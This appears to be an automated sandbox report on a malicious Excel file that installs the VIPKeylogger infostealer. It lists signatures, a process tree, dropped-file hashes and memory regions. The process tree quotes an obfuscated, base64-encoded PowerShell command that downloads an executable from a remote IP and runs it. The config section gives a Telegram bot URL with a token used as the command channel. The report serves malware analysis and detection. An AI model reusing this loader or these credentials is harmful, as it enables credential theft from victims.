Analysis

  • max time kernel
    122s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 09:49

General

  • Target

    1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls

  • Size

    166KB

  • MD5

    9ff5d2917f2746bbb0d57e8b0e4ed3b3

  • SHA1

    27489eb0a1052224bf3424f5c44389f34aa59d27

  • SHA256

    1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72

  • SHA512

    183d922c39a61c8f5811afbd1c1a7f7d0b1ed91ecace04ccca761df117a6d19948c64ed2b0580cfb06f7b5a4e50450adde409e1be9c645a454cb0c8ba3d9614e

  • SSDEEP

    3072:7rYpmZjeXnNUKOORV+OTCpMC9+Ts/y6gM03cmTwOCW:vY0cnNdkOudKjMXG

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7121690251:AAEuf5zFrwn6F6mTVPJTwU5P1nN1ULFLElA/sendMessage?chat_id=7071568333

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2412
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'JHFobFFyVUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSZGVGaU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdHcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6VVJkLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUU5tcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNbFUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtUWEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxaGxRclVFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNDUuNjYuMjMxLjIwOS8xMzEvY3RmbW9uLmV4ZSIsIiRFTnY6QVBQREFUQVxjdGZtb24uZXhlIiwwLDApO3NUYVJ0LXNMZWVwKDMpO3N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGN0Zm1vbi5leGUi'+[chAr]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'JHFobFFyVUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSZGVGaU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdHcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6VVJkLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUU5tcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNbFUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtUWEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxaGxRclVFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNDUuNjYuMjMxLjIwOS8xMzEvY3RmbW9uLmV4ZSIsIiRFTnY6QVBQREFUQVxjdGZtb24uZXhlIiwwLDApO3NUYVJ0LXNMZWVwKDMpO3N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGN0Zm1vbi5leGUi'+[chAr]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:572
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1604
        • C:\Users\Admin\AppData\Roaming\ctfmon.exe
          "C:\Users\Admin\AppData\Roaming\ctfmon.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:332
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\ctfmon.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2360

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          971c514f84bba0785f80aa1c23edfd79

          SHA1

          732acea710a87530c6b08ecdf32a110d254a54c8

          SHA256

          f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

          SHA512

          43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          cf3bd07399be9f4084372184779c0335

          SHA1

          cf61b1f8e6031e277dc6702aefab4547aba41c12

          SHA256

          7072ef60a408d2ff9b84080ea6712917fa27a384b201df0aa1032f7a1331dd11

          SHA512

          7bf7d4e2bb83dcd06c5673f8266d4f9b87b8acf72faba60db4358521d03076cb10923946300a5e46828797a8e0cc786a7627b7f24436b634d28b2fb818de8067

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          b45fbb9ce0d2f1e273b0998784d91bc2

          SHA1

          4f516b2eddefca55966d604b112e67475c5ff4a4

          SHA256

          2fd34f3dab3327d1ea8b51beb38848e58e96734f32973a386ff52326ec7f3112

          SHA512

          cba01a4c0d5793e2c0b799223aa7e380b2b99787824bbab5eeae2b987e7730ae1d175c3b5766838aa6bf2959afca493075fcf02f3a1131b5c2c10abc4c538824

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\ienetsat[1].hta

          Filesize

          12KB

          MD5

          c874a7cd1ef60df49ffa191421406a09

          SHA1

          8ea6515cf44c728d29fe179719602346e96280a3

          SHA256

          b72942e91327de4efa1e5741123e4bd83b03602d3546f6727499a7e8770e6683

          SHA512

          b06ed3b136d5acb2699927a7ec636fb6149781b4ba47eb25e81dd040d71a01872bdeb6be4afb68792354ad4a3e4eca9c44e4b4497da57d7b5e99f69494ddb667

        • C:\Users\Admin\AppData\Local\Temp\Cab11DC.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp

          Filesize

          1KB

          MD5

          bfdbaf2504c657096cbf4aa07158d24d

          SHA1

          614c6451a62fa41b5f5e49bb0be00814468ea9e3

          SHA256

          ea708fa16c8f778cfa5ce181e3c34b5692a67d91b832763410156a21fd86f785

          SHA512

          d833bd086e328d47fcec0c5cc264dbf151edc854c3e199801a2016aeb749a807dff401f9a04a9685002eaee2f3a9bf43224fa8cce8d8e29ad6c0935c8c4b20e4

        • C:\Users\Admin\AppData\Local\Temp\avpvcuom.dll

          Filesize

          3KB

          MD5

          afe7b327497749f3d9b45e60893db9fd

          SHA1

          6095037d2d5008eae8da481e3f4411401a35808b

          SHA256

          c3b9839b2a24ccfd0e7f346f8a5175f6911019ff705fe5559437386de7302ae2

          SHA512

          f9df0b039fc0be33a7f8ec55fc47a5bc16741baf0d2c433605fabfb9f5215ed5b1d4ee3298190c97e3803b30f5d969332770865293256ca0450cac47f06fe0c5

        • C:\Users\Admin\AppData\Local\Temp\avpvcuom.pdb

          Filesize

          7KB

          MD5

          c9f5898ca85af495e52fb9d846b543d2

          SHA1

          4045cb65477654a45095aedc47d44dd175812c8a

          SHA256

          72a06cad84f56902747380783c3d13ac55040256e3c4c65af729ded147972c18

          SHA512

          74f29529b49659822e35cbd65288dcfe94e4aa08d49e6e6585d7e8b26524b8c404a2bb518d94616ceb51394612b87de580cecdcdd4d7f9ba10a4c3ae687d4a03

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SDPZEA0W.txt

          Filesize

          68B

          MD5

          8c8f0be7cca815cb1fbf2dcf6077ae2f

          SHA1

          7017fb0ac1192d732b1b201d8ce4d98c2d89624c

          SHA256

          ee3b7c3bced350c1eb975a706b612d5f63810ff9219e5e25726821d3867c86b8

          SHA512

          607e8e676162965cb49fb09d9e621d31af80479126ece5fa90df3b3118ef9a273aaffa5a61c19a42d82585d94ebee0688bc32e422e6330d880a13b310deb05f9

        • C:\Users\Admin\AppData\Roaming\ctfmon.exe

          Filesize

          732KB

          MD5

          2754c20856dbcc1c2d9e8588e9ed16d5

          SHA1

          34e0af1d464a5ba9decc0c7d6fa8fc4791c528d5

          SHA256

          c8817e34d3e3721ad4a24061d9df7839a69c40661e9cf58b33b036fd3a282acd

          SHA512

          1d0398f4f6910396379930253436ec86d152c08a0cc88fc5cbea986211be9fe00bfabdb9b3bc39b6f323b477b60e84d1279d7bd319243ed6bdc588e2e2cba486

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp

          Filesize

          652B

          MD5

          08fe1110373d918bcde578ebdd65dc32

          SHA1

          0d00b9471a17a9632d84bbc326b26d9aee995d3e

          SHA256

          11e71860876dc07c6f91d8d5e341a9213f85a78467a4347bdbfd72f63b8c7f46

          SHA512

          2a14a75eb80db6fe60c369ffef39f7744a6938449a3e3d81f4650f321e769b39c64d9ecb119a63aedf36f8473477896446d404ab4ee7e0ce03026a43ee863781

        • \??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.0.cs

          Filesize

          452B

          MD5

          1c63aca6fcd4b799dee16b55bce4c6e2

          SHA1

          8fcd80ccd2301534e23bcfd20fd94ddc46df522a

          SHA256

          4eb92cf06004499456c3305b5cb070bbe43de8844b267b72878ace8c339613fb

          SHA512

          beded648bb2a995fa8a98da6d6682f43bd33e381953def85acf6ef69e77a9f2c8faab6f421c4eff6fdd3988df8c5b46bded68b9097052ce84cff02cfa70c9c0c

        • \??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline

          Filesize

          309B

          MD5

          3b34610a3ca9d4f87d2d3a060862a43b

          SHA1

          58d5fd8d37d1e59929d497a237e4c9cf35bd7f99

          SHA256

          f9ef5a8e7ae4c313a0bbee5a101ef6ba990ee1a304fc1d1b8a60e74b9d6d6743

          SHA512

          b734d0d832b3408ef61021d5d88799a66884756b64b72122854bbb11a31082e1e9ad6320905aaf4bbfd3d83fd6bfd86f75a99aa0126fea4d8ebc64b1453ab20b

        • memory/332-79-0x0000000001290000-0x000000000142B000-memory.dmp

          Filesize

          1.6MB

        • memory/1676-60-0x0000000006A80000-0x0000000006C1B000-memory.dmp

          Filesize

          1.6MB

        • memory/1904-17-0x0000000001170000-0x0000000001172000-memory.dmp

          Filesize

          8KB

        • memory/2360-85-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-101-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-107-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-76-0x0000000000400000-0x0000000000441000-memory.dmp

          Filesize

          260KB

        • memory/2360-77-0x0000000000400000-0x0000000000441000-memory.dmp

          Filesize

          260KB

        • memory/2360-113-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-80-0x00000000007F0000-0x0000000000850000-memory.dmp

          Filesize

          384KB

        • memory/2360-81-0x0000000000CD0000-0x0000000000D2C000-memory.dmp

          Filesize

          368KB

        • memory/2360-82-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-83-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-109-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-115-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-87-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-89-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-91-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-93-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-95-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-97-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-99-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-121-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-103-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-105-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-111-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-117-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-119-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-139-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-137-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-135-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-133-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-131-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-129-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-127-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-125-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2360-123-0x0000000000CD0000-0x0000000000D28000-memory.dmp

          Filesize

          352KB

        • memory/2412-53-0x00000000724CD000-0x00000000724D8000-memory.dmp

          Filesize

          44KB

        • memory/2412-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

          Filesize

          44KB

        • memory/2412-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2412-18-0x0000000002510000-0x0000000002512000-memory.dmp

          Filesize

          8KB

        • memory/2412-1176-0x00000000724CD000-0x00000000724D8000-memory.dmp

          Filesize

          44KB